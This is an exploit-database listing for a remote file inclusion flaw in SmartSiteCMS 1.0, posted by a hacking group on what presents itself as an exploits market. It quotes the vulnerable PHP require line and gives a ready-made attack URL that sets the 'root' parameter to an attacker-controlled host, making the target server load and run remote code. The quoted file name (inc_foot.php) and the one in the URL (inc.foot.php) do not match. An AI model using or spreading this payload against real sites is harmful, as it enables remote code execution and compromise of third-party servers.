[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SmartSiteCMS 1.0 (root) Remote File Inclusion Vulnerability

Author
Archit3ct
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-535
Category
web applications
Date add
19-06-2006
Platform
unsorted
===========================================================
SmartSiteCMS 1.0 (root) Remote File Inclusion Vulnerability
===========================================================



# smartsite cms <= 1.0 Remote File Inclusion
#
# Contact : irc.gigachat.net #ir4dex
# Risk : High
# Class : Remote
# Script : smartsite cms
# Version : not specified
# URL: http://www.smartsitecms.net/
---------------------------------------------------------------------

Vulnerable code :

require($root . "include/inc_foot.php");

---------------------------------------------------------------------

http://www.site.com/[smartsitecmspath]/include/inc.foot.php?root=http://[attacker]

by Archit3ct and IR4DEX GROUP

Greetz: Darkfire



#  0day.today [2024-12-24]  #